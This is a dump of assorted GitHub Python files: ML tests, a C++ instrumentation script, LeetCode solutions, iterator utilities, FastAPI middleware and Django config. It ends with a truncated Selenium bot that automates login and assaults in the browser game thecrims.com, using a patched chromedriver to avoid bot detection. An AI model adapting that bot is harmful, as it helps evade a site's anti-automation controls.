Autoencoder(input_dim=4, embedding_dim=2, hidden_dims=[3])\n # X = np.random.rand(1, 4).astype(np.float32)\n # X_hat, Y = ae(X)\n # X_ = np.random.rand(5, 4).astype(np.float32)\n # print(ae.get_embedding(inputs=X_))\n\n # ---------------- Expand first layer AE -----------\n ae = Autoencoder(input_dim=4, embedding_dim=2, hidden_dims=[3])\n X = np.random.rand(1, 4).astype(np.float32)\n X_hat, Y = ae(X)\n\n # print(\"Before expand:\")\n # ae.info(show_weight=True)\n\n ae.expand_first_layer(layer_dim=6)\n X_2 = np.random.rand(1, 6).astype(np.float32)\n X_hat, Y = ae(X_2)\n # print(\"After expand:\")\n # ae.info(show_weight=True)\n print(ae.get_layers_size())\n\n # ------------------ Test wider deeper ------------\n # ae.info()\n # print(\"##### ----> Modify\")\n # ae.wider(added_size=2)\n # ae.deeper()\n # ae.info()\n","repo_name":"hxtruong6/graph-embedding","sub_path":"src/utils/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":14229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34129793536","text":"#!/usr/bin/env python\n# (Python >= 2.6 including >= 3)\n\n# Using regexps for parsing C++ is, of course, entirely a hack.\n# Configuration that you might want to change is in this file,\n# below the help message and above the trickier code.\n\nimport re, os, sys, subprocess, glob\n\nif len(sys.argv) < 2 or sys.argv[1] in set(['-h','-?','-help','--help']) \\\n\t\tor sys.argv[1] not in set(['instrument', 'restore']):\n\tprint(\"\"\"\nUsage: %s [instrument|restore]\n 'instrument' adds/updates instrumentation; 'restore' deletes it.\n\nInstrumentation is just additions to Lasercake code that send\ndebug message info to stdout upon entering most Lasercake functions.\n\nIt can be useful combined with -Q or such to help debug whether two\ndifferent compilations or runs of Lasercake that *should* be doing\nthe exact same thing in fact *are* doing the exact same thing.\n\nIf there's a problem with buggy optimizers, this might be unhelpful,\nbecause the instrumentation will quite likely change what the compiler's\noptimizer does.\n\"\"\" % sys.argv[0])\n\tsys.exit(0)\n\ndo_restore = True\ndo_instrument = (sys.argv[1] == 'instrument')\n\n# Configuration that you might want to change:\n\n# Instrument functions in these files:\n# (Note: files not currently instrumented might not easily work\n# to instrument, because of regexp hacks doing the wrong thing\n# or argument types that can't easily be serialized. To fix the\n# latter, add functions for your types similar to\n# std::ostream& operator<<(std::ostream&, type)\n# , or put the troublesome argument's type name [in the form it's\n# used textually] in excluded_re below, or add an overload in\n# debug_print_deterministically.hpp.)\nfilenames = glob.glob('*.cpp')\n\n# Any function argument type strings (as written) that contain\n# anything matching this regexp are omitted (not attempted to\n# be written to output). This can be useful for large or\n# impossible-to-output data (though various tricky things *can*\n# be done for certain data; see debug_print_deterministically.hpp).\nexcluded_re = re.compile(r\"\"\"\n \\b(?:\n world|frame_output_t|gl_all_data|gl_collection|gl_call_data\n |state_t|tile_physics_state_t|volume_calipers|active_fluids_t\n |water_groups_by_location_t|persistent_water_group_info\n |groupable_water_volume_calipers_t|persistent_water_groups_t\n |objects_map|object_shapes_t\n )\\b\n |\\bQ[A-Z]|\\bLasercake[A-Z]\n |function|_map\\b|_set\\b|\\bset\\b|\\bmap\\b\n |collision_detector|priority_queue|borrowed_bitset\n \"\"\", re.VERBOSE)\n\n# Avoid these specific functions for speed reasons.\n# (Alternately, we could put e.g. /*noinstrument*/ immediately before\n# the function's begin curly brace and that would also prevent this code\n# from instrumenting that function.)\nfunction_names_to_skip_re = re.compile(r\"\"\"\n \\b(\n in_old_box|compute_tile_color|collidable_tile|prepare_tile\n |cast_vector3_to_float|cast_vector3_to_double|look_here\n |tile_manhattan_distance_to_tile_bounding_box\n |do_tile\n )\\b\n \"\"\", re.VERBOSE)\n\n# The code below is closer to black magic, though it's somewhat commented.\n# If you can tweak the regexps or output, for your gain, without breaking\n# anything that currently works (instrument and recover on all the files\n# in the default value of 'filenames', and as much deterministicness of\n# Lasercake output as we can get), then go ahead!\n\nfind_functions_re = re.compile(\n\tr\"\"\"\\b(\\w+) #function name\n\t \\( #begin parenthesis\n\t ([^()]*) #arguments\n\t \\) #end parenthesis\n\t \\s*(?:const\\s*)? #filler matter\n\t (?::[^;]*?[)\\s])? # constructor filler matter, ending with ) or\n\t # space right before the function begin curly\n\t # brace.\n\t # Semicolons are excluded as a hack to keep the\n\t\t\t # ?: operator from occasionally looking like a\n\t\t\t # constructor definition e.g. non-function\n\t\t\t # result_type(*i) in:\n\t\t\t # i ? result_type(*i) : result_type();\n\t { #begin function body\n\t \"\"\",\n\tre.VERBOSE | re.DOTALL)\n\nfilecontents_initial = {}\nfor filename in filenames:\n\twith open(filename, 'r') as f:\n\t\tfilecontents_initial[filename] = f.read()\n\nargname_re = re.compile(r\"\"\"\n\t\t(.*?[^[<(]) #type\n\t\t(\\b\\w+) #arg name\n\t\t(\\s*=[^,]+)? #default argument value\n\t\t, #comma between arguments (or for hack at end)\n\t\t\"\"\",\n\t\tre.VERBOSE | re.DOTALL)\ndef get_arg_names(argstr):\n\t#return re.findall(argname_re, argstr+',')\n\tresult = []\n\tfor m in re.finditer(argname_re, argstr+','):\n\t\t#print(m.group(1), m.group(2), re.search(excluded_re, m.group(1)))\n\t\tif not re.search(excluded_re, m.group(1)):\n\t\t\tresult.append(m.group(2))\n\treturn result\n\n# Give up on parameter packs / vararg functions\n# rather than try hard to implement sensible things for uncommon functions.\nfunctions_to_give_up_on_re = re.compile(r\"\\.\\.\\.\")\n\n# These deal strangely with newlines/tabs/etc currently:\nescape_string_for_C_re = re.compile(r\"\"\"([\"\\\\])\"\"\")\ncollapse_whitespace_re = re.compile(r\"\"\"\\s+\"\"\")\ndef escape_string_for_C(string):\n\treturn re.sub(escape_string_for_C_re, r'\\\\\\1',\n\t\t\tre.sub(collapse_whitespace_re, r' ', string))\ndef make_string_for_C(string):\n\treturn '\"' + escape_string_for_C(string) + '\"'\nde_curly_re = re.compile(r'''\\s+{$''')\n\n# These are placed directly into a regex; luckily they\n# don't contain any regex special characters:\nbegin_debug_instrument_str = \" {DEBUG_INSTRUMENT_BEGIN;\"\nend_debug_instrument_str = \"DEBUG_INSTRUMENT_END;}\"\n# The regex that includes those lucky strings above:\nremove_instruments_re = re.compile(\n\tbegin_debug_instrument_str+'.*?'+end_debug_instrument_str)\n\n# TODO find a way to print 'this', only for member functions?\ndef augment_functions(filename, m):\n\tif m.group(1) in set(['if', 'while', 'switch', 'for', 'do', 'catch',\n\t 'BOOST_SCOPE_EXIT']):\n\t\treturn m.group(0)\n\tif re.search(functions_to_give_up_on_re, m.group(0)):\n\t\treturn m.group(0)\n\tif re.search(function_names_to_skip_re, m.group(1)):\n\t\treturn m.group(0)\n\t# This file is mostly time-critical functions:\n\tif filename == 'the_decomposition_of_the_world_into_blocks.cpp' \\\n\t\t\tand m.group(1) != 'ensure_realization_impl':\n\t\treturn m.group(0)\n\tfnname = m.group(1)\n\targnames = get_arg_names(m.group(2))\n\tresult = m.group(0)\n\tresult += begin_debug_instrument_str\n\tresult += (\"\"\" debug_print_ostream() << \"%s(\"; \"\"\" % (escape_string_for_C(fnname)))\n\t#result += \"\"\" {debug_print_ostream() << __func__ << '('; \"\"\"\n\t#result += \"\"\" {debug_print_ostream() << __FILE__ << ':' << __LINE__ << ':' << __PRETTY_FUNCTION__ << '('; \"\"\"\n\t#result += \"\"\" {debug_print_ostream() << __PRETTY_FUNCTION__ << \" (\"; \"\"\"\n\tfirst = True\n\tfor argname in argnames:\n\t\tif first:\n\t\t\tfirst = False\n\t\telse:\n\t\t\tresult += \"\"\"debug_print_ostream() << \", \"; \"\"\"\n\t\tresult += \"\"\"debug_print_val_deterministically(\"\"\"+argname+\"); \"\n\tfnfullish = re.sub(de_curly_re, '', m.group(0))\n\t#result += r\"\"\"debug_print_ostream() << \")\\n\";}\"\"\"\n\t#result += r\"\"\"debug_print_ostream() << \"): \" << __PRETTY_FUNCTION__ << '\\n';}\"\"\"\n\t# There was a difference between 'long int' and 'long long int' meaning int64_t\n\t# on two different platforms, so avoid __PRETTY_FUNCTION__.\n\t# Hopefully __LINE__ is consistent; it'd be better to compute it here.\n\t# Stringize it at preprocessor-time, anyway, to make it faster at runtime if possible.\n\tresult += r\"\"\"debug_print_ostream() << \"): %s:\" BOOST_PP_STRINGIZE(__LINE__) \": %s\\n\";\"\"\" % \\\n\t\t\t(escape_string_for_C(filename),\n\t\t\tescape_string_for_C(fnfullish))\n\tresult += end_debug_instrument_str\n\treturn result\n\nfilecontents_clean = {}\nfilecontents_instrumented = {}\nfilecontents_final = {}\nfor filename in filenames:\n\tcont = filecontents_initial[filename]\n\tif do_restore:\n\t\tcont = filecontents_clean[filename] = re.sub(remove_instruments_re, '', cont)\n\tif do_instrument:\n\t\tcont = filecontents_instrumented[filename] = re.sub(\n\t\t\tfind_functions_re,\n\t\t\tlambda m: augment_functions(filename, m),\n\t\t\tcont)\n\tfilecontents_final[filename] = cont\n\nfor filename in filenames:\n\tif filecontents_final[filename] != filecontents_initial[filename]:\n\t\twith open(filename, 'w') as f:\n\t\t\tf.write(filecontents_final[filename])\n\nch = 'config.hpp'\nwith open(ch, 'r') as f:\n\tconfig_contents_initial = f.read()\n\ncont = config_contents_initial\nif do_restore:\n\tcont = re.sub('#if 1\\|\\|DEBUG_PRINT_DETERMINISTICALLY', '#if DEBUG_PRINT_DETERMINISTICALLY', cont)\nif do_instrument:\n\tcont = re.sub('#if DEBUG_PRINT_DETERMINISTICALLY', '#if 1||DEBUG_PRINT_DETERMINISTICALLY', cont)\nconfig_contents_final = cont\n\nif config_contents_final != config_contents_initial:\n\twith open(ch, 'w') as f:\n\t\tf.write(config_contents_final)\n\n","repo_name":"Lasercake/Lasercake","sub_path":"instrument_code_for_determinacy_checking.py","file_name":"instrument_code_for_determinacy_checking.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"15498848227","text":"#link-extractor.py\nimport csv\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef extract_all_links(url):\n html = requests.get(url)\n content = html.text\n soup = BeautifulSoup(content,'html.parser').find_all('a')\n links = [link.get('href') for link in soup]\n return links\n\ndef pretty_print_links(link_lst):\n for link in link_lst:\n print(link)\n\ndef write_to_csv(web_links):\n user_input = input('Please enter a save name for the file (basename excluding extension) > ')\n with open(user_input+'.csv','w') as csv_file:\n csv_writer = csv.writer(csv_file)\n for link in web_links:\n csv_writer.writerow([link])\n\nuser_provided_url = input('Please paste in your url here: \\n')\nprint('Thank you. Creating list now...')\ntime.sleep(5)\nweb_links = extract_all_links(user_provided_url)\npretty_print_links(web_links)\nwrite_to_csv(web_links)\n","repo_name":"jfish2/Link-Extractor","sub_path":"link-extractor.py","file_name":"link-extractor.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1640748322","text":"class Solution:\n def isRobotBounded(self, instructions: str) -> bool:\n pos_x, pos_y = 0, 0\n dir_x, dir_y = 0, 1\n\n for instruction in instructions:\n\n if instruction == 'L':\n dir_x, dir_y = -dir_y, dir_x\n\n elif instruction == 'R':\n dir_x, dir_y = dir_y, -dir_x\n\n else:\n pos_x += dir_x\n pos_y += dir_y\n\n return (pos_x, pos_y) == (0, 0) or (dir_x, dir_y) != (0, 1)","repo_name":"amogchandrashekar/Leetcode","sub_path":"Medium/Robot Bounded In Circle.py","file_name":"Robot Bounded In Circle.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37330379816","text":"import math\n\n\ndef MaxAd(ads, slots):\n revenue = 0\n ads = merge_sort(ads)\n slots = merge_sort(slots)\n for i in range(len(slots)):\n revenue = revenue + slots[i]*ads[i]\n return revenue\n\n\ndef merge_sort(lst):\n if(len(lst) == 1):\n return lst\n else:\n mid = math.floor(((len(lst) - 1) - 0)/2)\n left = merge_sort(lst[0: mid + 1])\n right = merge_sort(lst[mid + 1: len(lst)])\n return merge(left, right)\n\n\ndef merge(left, right):\n lst = [0 for i in range(len(left) + len(right))]\n e = 0\n r = 0\n for i in range(len(left) + len(right)):\n if(e >= len(left)):\n lst[i] = right[r]\n r = r + 1\n elif(r >= len(right)):\n lst[i] = left[e]\n e = e + 1\n elif(left[e] >= right[r]):\n lst[i] = left[e]\n e = e + 1\n else:\n lst[i] = right[r]\n r = r + 1\n return lst\n\n\ndef input_multiple(n, e, h):\n try:\n lst = [0 for i in range(n)]\n for i in range(n):\n flag = False\n while flag is False:\n x = int(input())\n if(x >= e and x <= h):\n lst[i] = x\n flag = True\n else:\n raise ValueError\n return lst\n except ValueError:\n print(\"please enter the value between {e} and {h}\")\n\n\ndef input_single(e, h):\n try:\n flag = False\n while flag is False:\n x = int(input())\n if(x >= e and x <= h):\n flag = True\n else:\n raise ValueError\n return x\n except ValueError:\n print(\"please enter it between {e} and {h}\")\n\n\nif(__name__ == \"__main__\"):\n print(merge_sort([3, 1, 4, 2, 5]))\n n = input_single(1, 10**3)\n ads = input_multiple(n, -10**5, 10**5)\n slots = input_multiple(n, -10**5, 10**5)\n print(MaxAd(ads, slots))\n\n\n","repo_name":"akhileshwar1/algo-data-structs","sub_path":"algo/greedy/max_ad.py","file_name":"max_ad.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22022520423","text":"import random\nfrom collections.abc import Iterator\nfrom typing import Any, List, Optional\n\n\nclass PeekingIterator(Iterator):\n \"\"\"An iterator that lets you :meth:`peek` at the next item on deck.\n Returns None when there is no next item (i.e. when\n :meth:`__next__` will produce a `StopIteration` exception).\n\n >>> p = PeekingIterator(iter(range(3)))\n >>> p.__next__()\n 0\n >>> p.peek()\n 1\n >>> p.peek()\n 1\n >>> p.__next__()\n 1\n >>> p.__next__()\n 2\n >>> p.peek() == None\n True\n >>> p.__next__()\n Traceback (most recent call last):\n ...\n StopIteration\n \"\"\"\n\n def __init__(self, source_iter: Iterator):\n \"\"\"\n Args:\n source_iter: the iterator we want to peek at\n \"\"\"\n self.source_iter = source_iter\n self.on_deck: List[Any] = []\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n if self.on_deck:\n return self.on_deck.pop()\n else:\n item = self.source_iter.__next__()\n return item\n\n def peek(self) -> Optional[Any]:\n \"\"\"Peek at the upcoming value on the top of our contained\n :py:class:`Iterator` non-destructively (i.e. calling :meth:`__next__` will\n still produce the peeked value).\n\n Returns:\n The value that will be produced by the contained iterator next\n or None if the contained Iterator is exhausted and will raise\n `StopIteration` when read.\n\n \"\"\"\n if self.on_deck:\n return self.on_deck[0]\n try:\n item = next(self.source_iter)\n self.on_deck.append(item)\n return self.peek()\n except StopIteration:\n return None\n\n\nclass PushbackIterator(Iterator):\n \"\"\"An iterator that allows you to push items back onto the front\n of the sequence so that they are produced before the items at the\n front/top of the contained py:class:`Iterator`. e.g.\n\n >>> i = PushbackIterator(iter(range(3)))\n >>> i.__next__()\n 0\n >>> i.push_back(99)\n >>> i.push_back(98)\n >>> i.__next__()\n 98\n >>> i.__next__()\n 99\n >>> i.__next__()\n 1\n >>> i.__next__()\n 2\n >>> i.push_back(100)\n >>> i.__next__()\n 100\n >>> i.__next__()\n Traceback (most recent call last):\n ...\n StopIteration\n\n \"\"\"\n\n def __init__(self, source_iter: Iterator):\n self.source_iter = source_iter\n self.pushed_back: List[Any] = []\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n if self.pushed_back:\n return self.pushed_back.pop()\n return self.source_iter.__next__()\n\n def push_back(self, item: Any) -> None:\n \"\"\"Push an item onto the top of the contained iterator such that\n the next time :meth:`__next__` is invoked we produce that item.\n\n Args:\n item: the item to produce from :meth:`__next__` next.\n \"\"\"\n self.pushed_back.append(item)\n\n\nclass SamplingIterator(Iterator):\n \"\"\"An :py:class:`Iterator` that simply echoes what its\n `source_iter` produces but also collects a random sample (of size\n `sample_size`) from the stream that can be queried at any time.\n\n .. note::\n Until `sample_size` elements have been produced by the\n `source_iter`, the sample return will be less than `sample_size`\n elements in length.\n\n .. note::\n If `sample_size` is >= `len(source_iter)` then this will produce\n a copy of `source_iter`.\n\n >>> import collections\n >>> import random\n\n >>> random.seed(22)\n >>> s = SamplingIterator(iter(range(100)), 10)\n >>> s.__next__()\n 0\n\n >>> s.__next__()\n 1\n\n >>> s.get_sample()\n [0, 1]\n\n >>> collections.deque(s)\n deque([2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99])\n\n >>> s.get_sample()\n [78, 18, 47, 83, 93, 26, 25, 73, 94, 38]\n\n \"\"\"\n\n def __init__(self, source_iter: Iterator, sample_size: int):\n self.source_iter = source_iter\n self.sample_size = sample_size\n self.resovoir: List[Any] = []\n self.stream_length_so_far = 0\n\n def __iter__(self) -> Iterator:\n return self\n\n def __next__(self) -> Any:\n item = self.source_iter.__next__()\n self.stream_length_so_far += 1\n\n # Filling the resovoir\n pop = len(self.resovoir)\n if pop < self.sample_size:\n self.resovoir.append(item)\n if self.sample_size == (pop + 1): # just finished filling...\n random.shuffle(self.resovoir)\n\n # Swap this item for one in the resovoir with probabilty\n # sample_size / stream_length_so_far. See:\n #\n # https://en.wikipedia.org/wiki/Reservoir_sampling\n else:\n r = random.randint(0, self.stream_length_so_far)\n if r < self.sample_size:\n self.resovoir[r] = item\n return item\n\n def get_sample(self) -> List[Any]:\n \"\"\"\n Returns:\n The current sample set populated randomly from the items\n returned by the contained :class:`Iterator` so far.\n\n .. note::\n Until `sample_size` elements have been produced by the\n `source_iter`, the sample return will be less than `sample_size`\n elements in length.\n\n .. note::\n If `sample_size` is >= `len(source_iter)` then this will produce\n a copy of `source_iter`.\n \"\"\"\n return self.resovoir\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"scottgasch/pyutils","sub_path":"src/pyutils/iter_utils.py","file_name":"iter_utils.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"27597704267","text":"from random import choice\r\nimport turtle\r\nimport math\r\nfrom statistics import mean\r\n\r\ndef main():\r\n length, walks = 1000, 50\r\n steps = [(0,1),(1,0),(0,-1),(-1,0)]\r\n bo = turtle.Turtle()\r\n end_points = []\r\n \r\n #for each walk of 1000 steps, find the endpoint, add to list\r\n for i in range(walks):\r\n point = [0,0]\r\n for j in range(length):\r\n #point = list(map(sum,zip(point,choice(steps)))\r\n step = choice(steps)\r\n point[0] += step[0]\r\n point[1] += step[1]\r\n end_points.append(point)\r\n\r\n \r\n #draw the endpoints to the canvas\r\n bo.pu()\r\n for point in end_points:\r\n bo.goto(point[0],point[1])\r\n bo.stamp()\r\n bo.screen.mainloop()\r\n \r\n #Math from distance from origin endpoints\r\n distance = []\r\n for point in end_points:\r\n dist = math.sqrt(point[0]**2 + point[1]**2)\r\n distance.append(dist)\r\n # calculate average walk length\r\n print(f'\\nAverage walk length: {mean(distance)}')\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n main()","repo_name":"Bow14/PythonThonnyCode","sub_path":"Randstamp.py","file_name":"Randstamp.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37567411731","text":"from typing import Callable\nfrom loguru import logger\nfrom fastapi import Request, Response\n\n\nclass LoggerMiddleWare:\n \"\"\"\n MiddleWare для логирования запросов\n \"\"\"\n\n @staticmethod\n async def set_body(request: Request, body: bytes) -> None:\n async def receive():\n return {'type': 'http.request', 'body': body}\n\n request._receive = receive\n\n async def get_body(self, request: Request) -> bytes:\n body = await request.body()\n await self.set_body(request, body)\n return body\n\n async def __call__(\n self, request: Request, call_next,\n *args, **kwargs\n ):\n raw_request_body = await request.body()\n # Последующие действия нужны,\n # чтобы не перезатереть тело запроса\n # и не уйти в зависание event-loop'a\n # при последующем получении тела ответа\n await self.set_body(request, raw_request_body)\n raw_request_body = await self.get_body(request)\n request_body = raw_request_body.decode()\n logger.debug(\n f'accept request method: {request.method} from client: {request.client.host}.'\n f' url: {request.url}, params : {request.query_params}'\n f' body: {request_body}')\n\n response = await call_next(request)\n\n body = b\"\"\n async for chunk in response.body_iterator:\n body += chunk\n logger.debug(\n f'Response to client {request.client.host} body: {body.decode()}')\n return Response(\n content=body,\n status_code=response.status_code,\n headers=dict(response.headers),\n media_type=response.media_type\n )\n","repo_name":"artas/nanosemantic","sub_path":"app/midleware/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15060986163","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (IngredientViewSet, RecipeViewSet, TagViewSet,\n UserSubscribeView, UserSubscriptionsViewSet)\n\n\nrouter_v1 = DefaultRouter()\n\nrouter_v1.register(r'tags', TagViewSet, basename='tags')\nrouter_v1.register(r'ingredients', IngredientViewSet, basename='ingredients')\nrouter_v1.register(r'recipes', RecipeViewSet, basename='recipes')\n\nurlpatterns = [path('users/subscriptions/',\n UserSubscriptionsViewSet.as_view({'get': 'list'}\n ), name='subscriptions'),\n path('users//subscribe/',\n UserSubscribeView.as_view(), name='subscribe'),\n path('', include(router_v1.urls)),\n path('', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n ]\n","repo_name":"dlozko/foodgram-project-react","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42206900586","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frontend', '0003_tag_num'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='category',\n options={'ordering': ['site', 'inner_pos', 'pos', 'title_ru'], 'verbose_name': 'category', 'verbose_name_plural': 'categories'},\n ),\n migrations.RemoveField(\n model_name='category',\n name='title',\n ),\n migrations.AddField(\n model_name='category',\n name='title_en',\n field=models.CharField(default=b'', max_length=255, null=True, verbose_name='title en', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='category',\n name='title_ru',\n field=models.CharField(default=b'', max_length=255, verbose_name='title ru'),\n preserve_default=True,\n ),\n ]\n","repo_name":"vaad2/vestblog","sub_path":"frontend/migrations/0004_auto_20150309_1924.py","file_name":"0004_auto_20150309_1924.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2401439974","text":"import heapq\n\nclass Solution:\n def minRefuelStops(self, target: int, startFuel: int, stations: List[List[int]]) -> int:\n\n # Greedy Solution: TC: O(nlogn), Space: O(n)\n # Approach: Traverse each station in a loop\n # At each station, store prev station to calcuate how far travelled\n # Also add all previous stations to a max heap\n # If we run out of fuel at a station, use the heap to \n # Extract the station with most fuel\n # Continue until all stations have been traversed\n\n heap = []\n fuelRem = startFuel\n prev = 0\n result = 0\n\n for pos,fuel in stations + [[target,0]]:\n fuelRem -= pos-prev\n while fuelRem < 0 and len(heap):\n fuelRem += -heapq.heappop(heap)\n result += 1\n \n if fuelRem < 0:\n return -1\n \n heapq.heappush(heap, -fuel)\n prev = pos\n\n return result\n","repo_name":"SouradeepSaha/leetcode","sub_path":"871. Minimum Number of Refueling Stops.py","file_name":"871. Minimum Number of Refueling Stops.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29944734641","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nimport selenium.webdriver.support.ui as UI\nfrom selenium.common.exceptions import TimeoutException\nfrom contextlib import contextmanager\nfrom timeit import default_timer\nfrom bs4 import BeautifulSoup as BS\nimport time\nimport random\nimport sys\nimport string\nfrom termcolor import colored\n\n@contextmanager\ndef elapsed_timer():\n start = default_timer()\n elapser = lambda: default_timer() - start\n yield lambda: elapser()\n end = default_timer()\n elapser = lambda: end-start\n\n# Login information\nlogin_name = \"\"\npassword_text = \"\"\n\n# prep\ncurrent_stamina = 0\npercent_stamina = 0\n\ncurrent_toxic = 0\npercent_toxic = 0\n\nerror_counter = 0\nrave_counter = 0\n\noriginal_stdout = sys.stdout\n\npower_dict = {\n \"Robber\": {\n \"Prospect\": 100,\n \"Newbie\": 100,\n \"Snitch\": 100,\n \"Pickpocket\": 100,\n \"Shoplifter\": 10000,\n \"Crook\": 40000,\n \"Burglar\": 75000,\n \"Larcenist\": 150000,\n \"Mugger\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Hitman\": {\n \"Prospect\": 100,\n \"Bruiser\": 100,\n \"Bravo\": 100,\n \"Goon\": 100,\n \"Garrotter\": 20000,\n \"Cut-throat\": 60000,\n \"Murderer\": 90000,\n \"Butcher\": 160000,\n \"Desperado\": 250000,\n \"Kingpin\": 450000,\n \"Mobster\": 500000,\n \"Padrino\": 900000,\n \"Godfather\": 3000000\n },\n \"Businessman\": {\n \"Prospect\": 100,\n \"Ware-slave\": 100,\n \"Swindler\": 100,\n \"Employer\": 100,\n \"Entrepreneur\": 10000,\n \"Banker\": 40000,\n \"Manager\": 75000,\n \"Director\": 150000,\n \"Top executive\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Pimp\": {\n \"Prospect\": 100,\n \"Popcorn\": 100,\n \"Gigolo\": 100,\n \"Bawd\": 100,\n \"Pet Owner\": 10000,\n \"Player\": 40000,\n \"Procurer\": 75000,\n \"Pander\": 150000,\n \"Bitch Ruler\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Broker\": {\n \"Prospect\": 100,\n \"Hangaround\": 100,\n \"Criminal\": 100,\n \"Thug\": 100,\n \"Mafioso\": 10000,\n \"Capo\": 40000,\n \"Consigliere\": 75000,\n \"Boss\": 150000,\n \"Don\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n },\n \"Dealer\": {\n \"Prospect\": 100,\n \"Hangaround\": 100,\n \"Criminal\": 100,\n \"Thug\": 100,\n \"Mafioso\": 10000,\n \"Capo\": 40000,\n \"Consigliere\": 75000,\n \"Boss\": 150000,\n \"Don\": 200000,\n \"Kingpin\": 300000,\n \"Mobster\": 450000,\n \"Padrino\": 600000,\n \"Godfather\": 3000000\n }\n\n}\n\nignore_list = [ \"Godfather\", \"Padrino\", \"Mobster\", \"Kingpin\", \"Don\", \"Top executive\", \"Bitch Ruler\", \"Mugger\", \"Cut-throat\", \"Murderer\", \"Butcher\", \"Desperado\"]\nname_ignore = [ \"LanceHenriksen\", \"fraggerek\", \"Copat6\"]\n\n# patched cdc chromedriver\ndriver = webdriver.Chrome(\"chromedriver\")\nexecutor_url = driver.command_executor._url\nsession_id = driver.session_id\n\ndef attach_to_session(executor_url, session_id):\n original_execute = WebDriver.execute\n def new_command_execute(self, command, params=None):\n if command == \"newSession\":\n # Mock the response\n return {'success': 0, 'value': None, 'sessionId': session_id}\n else:\n return original_execute(self, command, params)\n # Patch the function before creating the driver object\n WebDriver.execute = new_command_execute\n driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})\n driver.session_id = session_id\n # Replace the patched function with original function\n WebDriver.execute = original_execute\n return driver\n\n# Open site + login\ndef login():\n global driver, login_name, password_text\n driver.get(\"https://www.thecrims.com/\")\n \n\n # write username to form\n username_input = WebDriverWait(driver, 50).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"loginform\"]/input[1]')))\n if username_input:\n try:\n username_input = driver.find_element_by_xpath('//*[@id=\"loginform\"]/input[1]')\n username_input.send_keys(f'{login_name}') \n except Exception as e: \n print(e)\n\n # write password to form\n password_input = WebDriverWait(driver, 50).until(EC.visibility_of_element_located((By.XPATH, '//*[@id=\"loginform\"]/input[2]')))\n if password_input:\n try:\n password_input = driver.find_element_by_xpath('//*[@id=\"loginform\"]/input[2]')\n password_input.send_keys(f'{password_text}') \n except Exception as e: \n print(e)\n \n try:\n login_button = driver.find_element_by_xpath('//*[@id=\"loginform\"]/button') \n login_button.click()\n except Exception as e: print(e)\n\n# Get stamina\ndef getStamina():\n global current_stamina, percent_stamina\n stamina_bar = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"nightclub-singleassault-attack-18\"]/div')))\n if stamina_bar:\n current_stamina = 